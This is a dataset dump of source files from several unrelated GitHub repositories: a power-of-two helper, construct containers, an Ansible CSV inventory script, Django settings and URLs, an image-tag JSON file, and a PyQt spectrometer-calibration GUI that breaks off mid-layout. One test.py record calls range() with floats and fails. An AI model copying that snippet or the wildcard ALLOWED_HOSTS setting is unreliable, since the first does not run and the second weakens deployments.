blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bb29d3646af959dd01b308da7b489742cb1bc25e | 419eee7672547fc178aaaa98614ab00c4c5d2303 | /Code Library/63.Smallest_Power_of_2_Greater_than_or_Equal_to_n.py | c4556558dcd5b2c826cff43d0c9ecd1ffc90939d | [] | no_license | PratikshaDanti/APS | 35fdc382bda3548c88b73ae8a72fffc37c0a0d8e | cbb3ac41f08394d95978211e73621689d13d9e1f | refs/heads/master | 2022-04-19T00:34:52.929430 | 2020-04-06T13:55:09 | 2020-04-06T13:55:09 | 236,159,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 23 08:52:01 2020
@author: Pratiksha
"""
def nextPowerOf2(n):
count = 0;
if (n and not(n & (n - 1))):
return n
while( n != 0):
n >>= 1
count += 1
return 1 << count;
n = int(input('Enter the value :'))
print(nextPowerOf2(n))
| [
"noreply@github.com"
] | noreply@github.com |
5709ce876b59bfb900914b67ff8695dfd1e01ca0 | 7548d980a4407477d06824a01a35b62c38f1a3b8 | /weeks7-8/prac4_Pacman/test.py | 44214c722b66cb21b0054e1e846543a8b641c299 | [] | no_license | xtaiba/11510056- | 8156b801759f5d0c5f6b8b1815bad50002ee3baa | 3656016525127eb1724c7ac03379d05d2a1c326f | refs/heads/master | 2020-04-03T21:42:39.473037 | 2019-01-05T09:57:12 | 2019-01-05T09:57:12 | 155,579,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | list = list(range(0.1,1,0.1))
print(list) | [
"11510056@mail.sustc.edu.cn"
] | 11510056@mail.sustc.edu.cn |
e0911a368b2851513e0a25e2d9532c21656f1e73 | f3a2bcb503eff16f58bfbb173ad9df1ba93d76f2 | /construct/lib/container.py | ba6849fcab586342cfee67a03ae24fac6b802ca3 | [] | no_license | Selfnet/self-control-server | a0e3a26da28a995da262afdc82d887fc4901e443 | dd0e9a072c73a106c1db89b751f377ea29d7a5ba | refs/heads/master | 2021-01-10T15:35:53.919816 | 2013-07-22T22:07:55 | 2013-07-22T22:07:55 | 8,586,071 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,702 | py | """
Various containers.
"""
try:
from collections import MutableMapping
except ImportError:
from UserDict import UserDict
class MutableMapping(UserDict):
data = property(lambda self: self.__dict__)
def recursion_lock(retval, lock_name = "__recursion_lock__"):
def decorator(func):
def wrapper(self, *args, **kw):
if getattr(self, lock_name, False):
return retval
setattr(self, lock_name, True)
try:
return func(self, *args, **kw)
finally:
setattr(self, lock_name, False)
wrapper.__name__ = func.__name__
return wrapper
return decorator
class Container(MutableMapping):
"""
A generic container of attributes.
Containers are the common way to express parsed data.
"""
def __init__(self, **kw):
self.__dict__ = kw
# The core dictionary interface.
def __getitem__(self, name):
return self.__dict__[name]
def __delitem__(self, name):
del self.__dict__[name]
def __setitem__(self, name, value):
self.__dict__[name] = value
def keys(self):
return self.__dict__.keys()
def __len__(self):
return len(self.__dict__.keys())
# Extended dictionary interface.
def update(self, other):
self.__dict__.update(other)
__update__ = update
def __contains__(self, value):
return value in self.__dict__
# Rich comparisons.
def __eq__(self, other):
try:
return self.__dict__ == other.__dict__
except AttributeError:
return False
def __ne__(self, other):
return not self == other
# Copy interface.
def copy(self):
return self.__class__(**self.__dict__)
__copy__ = copy
# Iterator interface.
def __iter__(self):
return iter(self.__dict__)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self.__dict__))
#def __str__(self):
# return "%s(%s)" % (self.__class__.__name__, str(self.__dict__))
def __str__(self):
return self.__pretty_str__()
@recursion_lock("<...>")
def __pretty_str__(self, nesting = 1, indentation = " "):
attrs = []
ind = indentation * nesting
for k, v in self.items():
if not k.startswith("_"):
text = [ind, k, " = "]
if hasattr(v, "__pretty_str__"):
text.append(v.__pretty_str__(nesting + 1, indentation))
else:
text.append(repr(v))
attrs.append("".join(text))
if not attrs:
return "%s()" % (self.__class__.__name__,)
attrs.insert(0, self.__class__.__name__ + ":")
return "\n".join(attrs)
class FlagsContainer(Container):
"""
A container providing pretty-printing for flags.
Only set flags are displayed.
"""
@recursion_lock("<...>")
def __pretty_str__(self, nesting = 1, indentation = " "):
attrs = []
ind = indentation * nesting
for k in self.keys():
v = self.__dict__[k]
if not k.startswith("_") and v:
attrs.append(ind + k)
if not attrs:
return "%s()" % (self.__class__.__name__,)
attrs.insert(0, self.__class__.__name__+ ":")
return "\n".join(attrs)
class ListContainer(list):
"""
A container for lists.
"""
__slots__ = ["__recursion_lock__"]
def __str__(self):
return self.__pretty_str__()
@recursion_lock("[...]")
def __pretty_str__(self, nesting = 1, indentation = " "):
if not self:
return "[]"
ind = indentation * nesting
lines = ["["]
for elem in self:
lines.append("\n")
lines.append(ind)
if hasattr(elem, "__pretty_str__"):
lines.append(elem.__pretty_str__(nesting + 1, indentation))
else:
lines.append(repr(elem))
lines.append("\n")
lines.append(indentation * (nesting - 1))
lines.append("]")
return "".join(lines)
class LazyContainer(object):
__slots__ = ["subcon", "stream", "pos", "context", "_value"]
def __init__(self, subcon, stream, pos, context):
self.subcon = subcon
self.stream = stream
self.pos = pos
self.context = context
self._value = NotImplemented
def __eq__(self, other):
try:
return self._value == other._value
except AttributeError:
return False
def __ne__(self, other):
return not (self == other)
def __str__(self):
return self.__pretty_str__()
def __pretty_str__(self, nesting = 1, indentation = " "):
if self._value is NotImplemented:
text = "<unread>"
elif hasattr(self._value, "__pretty_str__"):
text = self._value.__pretty_str__(nesting, indentation)
else:
text = str(self._value)
return "%s: %s" % (self.__class__.__name__, text)
def read(self):
self.stream.seek(self.pos)
return self.subcon._parse(self.stream, self.context)
def dispose(self):
self.subcon = None
self.stream = None
self.context = None
self.pos = None
def _get_value(self):
if self._value is NotImplemented:
self._value = self.read()
return self._value
value = property(_get_value)
has_value = property(lambda self: self._value is not NotImplemented)
#if __name__ == "__main__":
# c = Container(a = 5, b = 6)
# print c
| [
"kai-uwe@tafelrunde4.workstation.whnetz"
] | kai-uwe@tafelrunde4.workstation.whnetz |
d665d9272fcadbba28e19bae1cd2e2ba4d440a4b | dd63ac24f975649208233685218246a425c073ce | /ansible/dynamic_inventory/get_inventory.py | d6a98c953c766f3a294ecf996033a3079ec48e3b | [
"MIT"
] | permissive | joelwking/code-samples | 4f6824b3aafdaeaff6f98f09e01d1d71adc619f3 | 73f277221fc088c371e3fa33cbad1e16795018af | refs/heads/master | 2020-12-24T07:17:55.272299 | 2019-08-09T18:31:47 | 2019-08-09T18:31:47 | 59,486,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,805 | py | #!/usr/bin/env python
#
# get_inventory.py Sample program to create a dynamic inventory from a CSV file
#
# Usage: See the companion playbook get_invy.yml
#
# Copyright (c) 2016 World Wide Technology, Inc.
# All rights reserved.
#
# author: Joel W. King, World Wide Technology
#
# Reference: http://www.jeffgeerling.com/blog/creating-custom-dynamic-inventories-ansible
# Chapter 7 of Ansible for DevOps, a book on Ansible by Jeff Geerling.
#
#
import sys
import json
import csv
def main():
"Create a dynamic Ansible inventory from a spreadsheet"
GROUP = "F5_CREATE" # Name of the group referenced in the playbook
HOSTNAME = "STUDENT_POD" # Column header in the CSV file which we use as the host name
CSV_FILE = "f5_create.csv" # CSV file, this should be passed to the program
group_output = {
GROUP: dict(hosts=[]),
"_meta": {"hostvars": dict()}
}
#
# Read the CSV and format
#
with open(CSV_FILE) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
# Append the hostname to the list of hosts under the group
group_output[GROUP]["hosts"].append(row[HOSTNAME])
# Create an empty dictionary in the meta data for the host
group_output["_meta"]["hostvars"][row[HOSTNAME]] = dict()
# Populate the host variables from each column in the spreadsheet
for key, value in row.items():
group_output["_meta"]["hostvars"][row[HOSTNAME]][key] = value
return group_output
if __name__ == '__main__':
print json.dumps(main())
| [
"joel.king@wwt.com"
] | joel.king@wwt.com |
4a1758e7ca32cd345aa0c5b376f92a5dc0a0b52f | 7996d7fefe2d3e5b4d53df4376d6fd8908407a1a | /authentication/urls.py | 139def747c67ed7664c5e93050e1419ada49d7e8 | [] | no_license | Imraj423/twitterclone | 2aa1446ef6e5dec6548f26c6254d478a696970ec | 0c3dfab5436de9095248305d3994dc77549e0b1e | refs/heads/master | 2021-01-15T02:07:06.684002 | 2020-04-04T23:47:39 | 2020-04-04T23:47:39 | 242,843,822 | 0 | 0 | null | 2020-03-07T04:02:21 | 2020-02-24T21:08:23 | Python | UTF-8 | Python | false | false | 229 | py | from django.urls import path
from . import views
urlpatterns = [
path('signup/', views.signup, name='signup'),
path('login/', views.login_view, name='login'),
path('logout/', views.logoutUser, name='logout'),
]
| [
"dahqniss@gmail.com"
] | dahqniss@gmail.com |
79db5f1c36777c88d7fa3bc39575c57b377af1e3 | 81d2815060bdf51e59f40366df72954ad28b2398 | /4th_hw/fourth_homework/settings.py | fd3cb961f456cae77e2fd2c6099a1d6763910875 | [] | no_license | ningpop/LikeLion_7th_HW | 6016604427e335250f2e3daeec27f17731612b47 | b2c65a0b7a9a928a45cf07b67cd9ed18fb86d799 | refs/heads/master | 2020-06-30T18:08:54.024617 | 2019-12-30T16:17:03 | 2019-12-30T16:17:03 | 200,902,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,613 | py | """
Django settings for fourth_homework project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = bool( os.environ.get('DJANGO_DEBUG', False))
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'learning.apps.LearningConfig',
'accounts.apps.AccountsConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'fourth_homework.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['fourth_homework/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fourth_homework.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'learning', 'static')
]
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env) | [
"craft1933@naver.com"
] | craft1933@naver.com |
b3a946c7a77d0937013abc5cb13bd52aa0f0c0c6 | 6e11824b4a32049ce7df94b9edb42b1cb3cba68b | /src/gamelog.py | 3748590046b4de0eda8b7bb8d650d5597c814974 | [] | no_license | TickTockTech/pynheart | ce2f3ed39a30b1761e083541c5182c1032505845 | ac12d6678a49505479d4ce2303f2ff774cb7dfc1 | refs/heads/master | 2020-04-04T13:59:24.485552 | 2018-11-03T21:02:30 | 2018-11-03T21:02:30 | 155,982,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | import os
import logging
import logging.config
log_config = os.path.abspath(os.path.join(os.path.dirname(__file__), "log.cfg"))
logging.config.fileConfig(log_config)
# create logger
Log = logging.getLogger('gameLog')
| [
"allan@yisup.net"
] | allan@yisup.net |
644c6fd5abc3bfb9a657f9548487452187e4659e | 0b96015603d709b37dbd522ebae0a3b367e8e82f | /Tags/legs/167.png.py | 965b2bb29fe6b45fd6bed060acce93a1a65d1820 | [] | no_license | AWilcke/ClariFight | ccbbfec08192b029ce13ed11fc6967550ede74ce | d1689025c5087c70f2c33ad80d8417b45b4ebd01 | refs/heads/master | 2021-01-11T11:17:27.446503 | 2016-03-10T19:32:00 | 2016-03-10T19:32:00 | 53,609,870 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | {"body": "0.779967069626", "recreation": "0.823184847832", "fashion": "0.938068032265", "barefoot": "0.810911774635", "adult": "0.984340786934", "people": "0.976011514664", "nude": "0.901487231255", "nobody": "0.945029020309", "underwear": "0.758705735207", "one": "0.970272898674", "feet": "0.936763525009", "erotic": "0.902205824852", "footwear": "0.955862760544", "skin": "0.834527671337", "medicine": "0.865551114082", "sexy": "0.987516820431", "model": "0.923303186893", "clothing": "0.81817150116", "girl": "0.801391482353", "women": "0.974669098854"} | [
"arthur.wilcke@gmail.com"
] | arthur.wilcke@gmail.com |
54439c245d7fae5f35ec6680b74a2d298e21bec7 | 38422c3edeb269926502fed31a0761aff8dd3d3b | /Zeiss_spectrometer/Zeiss_spectrometer_Python3_v191002/Calib_Zeiss_spectrometer_GUI_v5.py | a35fdd8d0e04f888df7c292ff847d4857b865b8a | [] | no_license | vfurtula/Alle-projekter | 2dab3ccbf7ddb6be3ee09f9f5e87085f354dd84a | da3d7c9611088043e2aea5d844f1ae6056215e04 | refs/heads/master | 2022-06-07T05:17:35.327228 | 2020-04-30T10:28:48 | 2020-04-30T10:28:48 | 260,180,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47,654 | py | import os, sys, imp, serial, time, numpy
import scipy.interpolate
#from numpy.polynomial import polynomial as P
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.exporters
#from PyQt4 import QtGui, QtCore
from PyQt4.QtCore import QThread, QTimer, SIGNAL
import config_zeiss, ZaberXmcb_ascii
class zaber_Thread(QThread):
def __init__(self, sender, Za, adjust_mode, calib_file, *argv):
QThread.__init__(self)
self.end_flag=False
self.sender=sender
self.Za=Za
self.calib_mode=adjust_mode
self.calib_file=calib_file
if self.calib_mode=="wavelength":
self.axs=1
elif self.calib_mode=="slit":
self.axs=2
if argv:
self.move_num=argv[0]
def __del__(self):
self.wait()
def abort_move(self):
self.Za.set_Stop(1,self.axs)
self.end_flag=True
def return_pos_if_stopped(self):
return self.Za.return_Position_When_Stopped(1,self.axs)
def update(self):
min_pos=self.return_pos_if_stopped()
if min_pos in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),min_pos)
return
pos_val=self.get_zeiss_value(min_pos)
if self.calib_mode=="wavelength":
self.replace_line("config_zeiss.py",4,''.join(["Last_position_lambda=[",str(min_pos),",",str(pos_val),"]\n"]))
elif self.calib_mode=="slit":
self.replace_line("config_zeiss.py",5,''.join(["Last_position_slit=[",str(min_pos),",",str(pos_val),"]\n"]))
imp.reload(config_zeiss)
more_tals_obj=type('more_tals_obj',(object,),{'min_pos':min_pos, 'pos_val':pos_val})
self.emit(SIGNAL('more_tals(PyQt_PyObject)'), more_tals_obj)
def replace_line(self,file_name, line_num, text):
lines = open(file_name, 'r').readlines()
lines[line_num] = text
out = open(file_name, 'w')
out.writelines(lines)
out.close()
def run(self):
if self.sender==u'\u25b2':
check=self.Za.move_Relative(1,self.axs,10)
if check in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
return
self.update()
elif self.sender==u'\u25bc':
check=self.Za.move_Relative(1,self.axs,-10)
if check in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
return
self.update()
elif self.sender=='Move rel':
check=self.Za.move_Relative(1,self.axs,self.move_num)
if check in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
return
self.update()
elif self.sender=='Move abs':
check=self.Za.move_Absolute(1,self.axs,self.move_num)
if check in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
return
self.update()
elif 'Move to' in self.sender or 'Adjust' in self.sender:
position=self.get_pos(self.move_num)
check=self.Za.move_Absolute(1,self.axs,position)
if check in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
return
self.update()
elif self.sender=='-> nm':
min_pos=self.get_pos(self.move_num)
check=self.Za.set_Current_Position(1,self.axs,min_pos)
if check in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),check)
return
more_tals_obj=type('more_tals_obj',(object,),{'min_pos':min_pos, 'pos_val':self.move_num})
self.emit(SIGNAL('more_tals(PyQt_PyObject)'), more_tals_obj)
self.replace_line("config_zeiss.py",4,''.join(["Last_position_lambda=[",str(min_pos),",",str(self.move_num),"]\n"]))
imp.reload(config_zeiss)
elif self.sender=='-> mm':
min_pos=self.get_pos(self.move_num)
check=self.Za.set_Current_Position(1,self.axs,min_pos)
if min_pos in [serial.SerialException, ValueError]:
self.emit(SIGNAL('bad_zaber_val(PyQt_PyObject)'),min_pos)
return
more_tals_obj=type('more_tals_obj',(object,),{'min_pos':min_pos, 'pos_val':self.move_num})
self.emit(SIGNAL('more_tals(PyQt_PyObject)'), more_tals_obj)
self.replace_line("config_zeiss.py",5,''.join(["Last_position_slit=[",str(min_pos),",",str(self.move_num),"]\n"]))
imp.reload(config_zeiss)
else:
pass
def get_pos(self,nm):
x=[]
y=[]
with open(self.calib_file, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])]) #microstep pos.
if self.calib_mode=="wavelength":
y.extend([round(float(columns[1]),1)]) #wavelength
elif self.calib_mode=="slit":
y.extend([round(float(columns[1]),2)]) #slit
if numpy.min(nm)>=min(y) and numpy.max(nm)<=max(y):
#spline
pos_curve=scipy.interpolate.splrep(y, x, k=3, s=0)
#linear
#wv_curve = scipy.interpolate.splrep(x, y, k=1, s=0)
pos_pos = scipy.interpolate.splev(nm, pos_curve, der=0)
nums=numpy.rint(pos_pos) # round the up/down floats
return nums.astype(int)
def get_zeiss_value(self,pos):
x=[]
y=[]
with open(self.calib_file, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])]) #microstep pos.
if self.calib_mode=="wavelength":
y.extend([round(float(columns[1]),1)]) #wavelength
elif self.calib_mode=="slit":
y.extend([round(float(columns[1]),2)]) #slit
if numpy.min(pos)>=min(x) and numpy.max(pos)<=max(x):
#spline
wv_curve=scipy.interpolate.splrep(x, y, k=3, s=0)
#linear
#wv_curve = scipy.interpolate.splrep(x, y, k=1, s=0)
pos = scipy.interpolate.splev(pos, wv_curve, der=0)
if self.calib_mode=="wavelength":
return numpy.round(pos,1)
elif self.calib_mode=="slit":
return numpy.round(pos,2)
class Run_gui(QtGui.QDialog):
def __init__(self, MyBar, parent=None):
QtGui.QDialog.__init__(self, parent)
#super(Run_gui, self).__init__()
#####################################################
# constants
self.Validrange_lambda = config_zeiss.Validrange_lambda
self.Validrange_slit = config_zeiss.Validrange_slit
self.Range_lambda = config_zeiss.Range_lambda
self.Range_slit = config_zeiss.Range_slit
self.calibfile_lambda_str = config_zeiss.calibfile_lambda
self.calibfile_slit_str = config_zeiss.calibfile_slit
self.lambda_str=config_zeiss.lambdafile
self.slit_str=config_zeiss.slitfile
self.timestr = config_zeiss.timestr
self.filename_str = config_zeiss.filename
self.folder_str = config_zeiss.foldername
self.zaberport_str = config_zeiss.zaberport
self.sr510port_str = config_zeiss.sr510port
self.all_pos=[config_zeiss.Last_position_lambda[0]]
self.MyBar=MyBar
self.initUI()
def initUI(self):
self.infoCalibButton = QtGui.QPushButton('Calib files info',self)
################### MENU BARS START ##################
#MyBar = QtGui.QMenuBar(self)
fileMenu = self.MyBar.addMenu("File")
fileSavePlt = fileMenu.addAction("Save calib plot")
fileSavePlt.triggered.connect(self.set_save_plots)
fileSavePlt.setShortcut('Ctrl+P')
fileSaveSet = fileMenu.addAction("Save settings")
fileSaveSet.triggered.connect(self.set_save) # triggers closeEvent()
fileSaveSet.setShortcut('Ctrl+S')
fileClose = fileMenu.addAction("Close")
fileClose.triggered.connect(self.close) # triggers closeEvent()
fileClose.setShortcut('Ctrl+X')
modeMenu = self.MyBar.addMenu("Mode")
self.conMode = modeMenu.addAction("Connect to serial")
self.conMode.triggered.connect(self.set_connect)
self.disconMode = modeMenu.addAction("Disconnect from serial")
self.disconMode.triggered.connect(self.set_disconnect)
serialMenu = self.MyBar.addMenu("Serial")
self.serialZaber = serialMenu.addAction("Zaber stepper")
self.serialZaber.triggered.connect(self.ZaberDialog)
calibMenu = self.MyBar.addMenu("Calib")
self.calibWaveZeiss = calibMenu.addAction("Load ref lambda calib file")
self.waveZeiss = calibMenu.addAction("Load wavelength file")
self.waveZeiss.setShortcut('Ctrl+W')
self.calibWaveZeiss.triggered.connect(self.loadCalibLambdaDialog)
self.waveZeiss.triggered.connect(self.loadWaveDialog)
self.calibSlitZeiss = calibMenu.addAction("Load ref slit calib file")
self.slitZeiss = calibMenu.addAction("Load slit width file")
self.slitZeiss.setShortcut('Ctrl+Q')
self.calibSlitZeiss.triggered.connect(self.loadCalibSlitDialog)
self.slitZeiss.triggered.connect(self.loadSlitDialog)
################### MENU BARS END ##################
lb3 = QtGui.QLabel("CALIBRATE:",self)
lb3.setStyleSheet("color: blue")
self.cb3 = QtGui.QComboBox(self)
mylist3=["wavelength","slit"]
self.cb3.addItems(mylist3)
self.cb3.setCurrentIndex(mylist3.index("wavelength"))
#self.cb3.setEnabled(True)
##############################################
filename = QtGui.QLabel("File name",self)
foldername = QtGui.QLabel("Folder name",self)
self.filenameEdit = QtGui.QLineEdit(self.filename_str,self)
self.folderEdit = QtGui.QLineEdit(self.folder_str,self)
##############################################
# status info which button has been pressed
self.motorstep_lbl = QtGui.QLabel("ZABER stepper postion:", self)
self.motorstep_lbl.setStyleSheet("color: blue")
self.upButton = QtGui.QPushButton(u'\u25b2',self)
self.set_bstyle_v1(self.upButton)
self.downButton = QtGui.QPushButton(u'\u25bc',self)
self.set_bstyle_v1(self.downButton)
self.moverelButton = QtGui.QPushButton('Move rel',self)
self.moveabsButton = QtGui.QPushButton('Move abs',self)
#self.moveabsButton.setStyleSheet('QPushButton {color: red}')
self.moverelEdit = QtGui.QLineEdit(str(100),self)
self.moveabsEdit = QtGui.QLineEdit(str(10000),self)
self.moveButton = QtGui.QPushButton('Move to nm',self)
self.moveButton.setStyleSheet('QPushButton {color: magenta}')
self.moveEdit = QtGui.QLineEdit("",self)
self.stopButton = QtGui.QPushButton('STOP MOVE',self)
##############################################
# status info which button has been pressed
self.zeiss_lbl = QtGui.QLabel("ZEISS alignment:", self)
self.zeiss_lbl.setStyleSheet("color: blue")
self.alignEdit = QtGui.QLineEdit("",self)
self.setzeroButton = QtGui.QPushButton('-> nm',self)
self.setzeroButton.setStyleSheet('QPushButton {color: magenta}')
self.setzeroButton.setFixedWidth(70)
#self.setzeroButton.setStyleSheet('QPushButton {color: black}')
##############################################
# status info which button has been pressed
self.zeiss_cal_lbl = QtGui.QLabel("ZEISS calibration:", self)
self.zeiss_cal_lbl.setStyleSheet("color: blue")
self.calibButton = QtGui.QPushButton('',self)
self.calibButton.setStyleSheet('QPushButton {color: magenta}')
self.calibSaveButton = QtGui.QPushButton('',self)
#self.reorderButton = QtGui.QPushButton('Reorder',self)
#self.reorderButton.setFixedWidth(65)
#self.reorderButton.setEnabled(False)
##############################################
self.timetrace_str = QtGui.QLabel("TIME trace for storing plots and data:", self)
self.timetrace_str.setStyleSheet("color: blue")
##############################################
self.lcd1 = QtGui.QLCDNumber(self)
self.lcd1.setStyleSheet("color: black")
self.lcd1.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcd1.setNumDigits(6)
self.lcd2 = QtGui.QLCDNumber(self)
self.lcd2.setStyleSheet("color: magenta")
self.lcd2.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcd2.setNumDigits(6)
#self.lcd2.setFixedWidth(120)
self.lcd3 = QtGui.QLCDNumber(self)
self.lcd3.setStyleSheet("color: red")
self.lcd3.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcd3.setNumDigits(11)
self.lcd3.setFixedHeight(60)
self.lcd3.display(self.timestr)
##############################################
#g4_0=QtGui.QGridLayout()
#g4_0.addWidget(MyBar,0,0)
v4 = QtGui.QVBoxLayout()
#v4.addLayout(g4_0)
v4.addWidget(self.infoCalibButton)
g2_0 = QtGui.QSplitter(QtCore.Qt.Horizontal)
g2_0.addWidget(lb3)
g2_0.addWidget(self.cb3)
g8_1 = QtGui.QSplitter(QtCore.Qt.Vertical)
g8_1.addWidget(filename)
g8_1.addWidget(foldername)
g8_2 = QtGui.QSplitter(QtCore.Qt.Vertical)
g8_2.addWidget(self.filenameEdit)
g8_2.addWidget(self.folderEdit)
g8_3 = QtGui.QSplitter(QtCore.Qt.Horizontal)
g8_3.addWidget(g8_1)
g8_3.addWidget(g8_2)
v8 = QtGui.QSplitter(QtCore.Qt.Vertical)
v8.addWidget(g2_0)
v8.addWidget(g8_3)
g0_0 = QtGui.QSplitter(QtCore.Qt.Vertical)
g0_0.addWidget(self.motorstep_lbl)
g0_1 = QtGui.QSplitter(QtCore.Qt.Vertical)
g0_1.addWidget(self.upButton)
g0_1.addWidget(self.downButton)
g0_2 = QtGui.QSplitter(QtCore.Qt.Vertical)
g0_2.addWidget(self.lcd1)
h0 = QtGui.QSplitter(QtCore.Qt.Horizontal)
h0.addWidget(g0_1)
h0.addWidget(g0_2)
g0_3=QtGui.QSplitter(QtCore.Qt.Vertical)
g0_3.addWidget(self.moverelButton)
g0_3.addWidget(self.moveabsButton)
g0_3.addWidget(self.moveButton)
g0_4=QtGui.QSplitter(QtCore.Qt.Vertical)
g0_4.addWidget(self.moverelEdit)
g0_4.addWidget(self.moveabsEdit)
g0_4.addWidget(self.moveEdit)
g0_5=QtGui.QSplitter(QtCore.Qt.Vertical)
g0_5.addWidget(self.stopButton)
h1 = QtGui.QSplitter(QtCore.Qt.Horizontal)
h1.addWidget(g0_5)
h1.addWidget(g0_3)
h1.addWidget(g0_4)
v1 = QtGui.QSplitter(QtCore.Qt.Vertical)
v1.addWidget(g0_0)
v1.addWidget(h0)
v1.addWidget(h1)
g3_0=QtGui.QSplitter(QtCore.Qt.Vertical)
g3_0.addWidget(self.zeiss_lbl)
g3_1=QtGui.QSplitter(QtCore.Qt.Vertical)
g3_1.addWidget(self.alignEdit)
g3_1.addWidget(self.setzeroButton)
g3_2=QtGui.QSplitter(QtCore.Qt.Horizontal)
g3_2.addWidget(g3_1)
g3_2.addWidget(self.lcd2)
h4 = QtGui.QSplitter(QtCore.Qt.Vertical)
h4.addWidget(g3_0)
h4.addWidget(g3_2)
g5_0=QtGui.QSplitter(QtCore.Qt.Vertical)
g5_0.addWidget(self.zeiss_cal_lbl)
g5_1=QtGui.QSplitter(QtCore.Qt.Horizontal)
g5_1.addWidget(self.calibButton)
g5_1.addWidget(self.calibSaveButton)
h5 = QtGui.QSplitter(QtCore.Qt.Vertical)
h5.addWidget(g5_0)
h5.addWidget(g5_1)
g9_0 = QtGui.QSplitter(QtCore.Qt.Vertical)
g9_0.addWidget(self.timetrace_str)
g9_0.addWidget(self.lcd3)
# SET ALL VERTICAL COLUMNS TOGETHER
v_all = QtGui.QVBoxLayout()
v_all.addLayout(v4)
